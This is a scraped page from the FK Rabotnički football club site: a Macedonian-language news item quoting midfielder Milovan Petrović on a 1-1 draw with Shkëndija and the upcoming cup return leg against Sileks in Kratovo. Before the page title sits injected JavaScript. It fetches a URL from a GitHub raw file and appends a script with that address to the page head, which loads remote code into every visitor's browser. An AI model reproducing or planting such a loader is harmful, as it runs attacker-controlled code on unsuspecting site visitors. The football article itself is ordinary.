;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Петровиќ: Игравме храбро со Шкендија, ’памет во глава’ за Кратово
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Петровиќ: Игравме храбро со Шкендија, ’памет во глава’ за Кратово

Се ближи крајот на есенската полусезона, а и тој не е ништо поразличен за Работнички кога е динамиката во прашање, како и целиот досегашен тек, почнувајќи уште од европските искушенија ова лето. Среда – недела – среда, тоа е ритамот што го имаат „романтичарите“.

Во неделата нашиот тим одигра 1-1 против Шкендија во Кичево во првенствена битка, а веќе утре во Кратово ќе го одигра реванш натпреварот од четвртфиналето на Купот на Македонија. Работнички по првиот меч има предност од 3-0. Милован Петровиќ беше стрелец на погодокот против Шкендија, а истакнува дека тимот треба да одигра мудро и на утрешниот куп-дуел против Силекс.

„Нема многу време за анализи и за гледање назад, затоа што веќе утре не очекува нов натпревар. Одигравме квалитетно на дуелот со Шкендија, нашата идеја е секогаш иста – да се надигруваме со противникот. Први постигнавме погодок, имавме и други шанси во првиот дел, а потоа примивме гол од прекин на играта. Тоа е наша голема болка оваа сезона која повторно се појави и на овој меч. Сепак, во глобала одигравме добар меч и заслужено освоивме бод“, вели Петровиќ.

Утре (13 часот) следи реванш – натпреварот од четвртфиналето на Купот на Македонија. Работнички со предност од 3-0 остварена на првиот меч во Велес патува за Кратово.

„Имаме значителна предност пред утрешниот реванш, но тоа не значи и дека треба да се опуштиме. Што се вели, со ’памет во глава’ одиме за Кратово, затоа што има уште 90 минути од двомечот. Треба да одиграме мудро и да потврдиме сме дека поквалитетна екипа која заслужува да биде меѓу четирите најдобри во Купот на Македонија“, истакнува играчот за врска, Милован Петровиќ.

Leave a Reply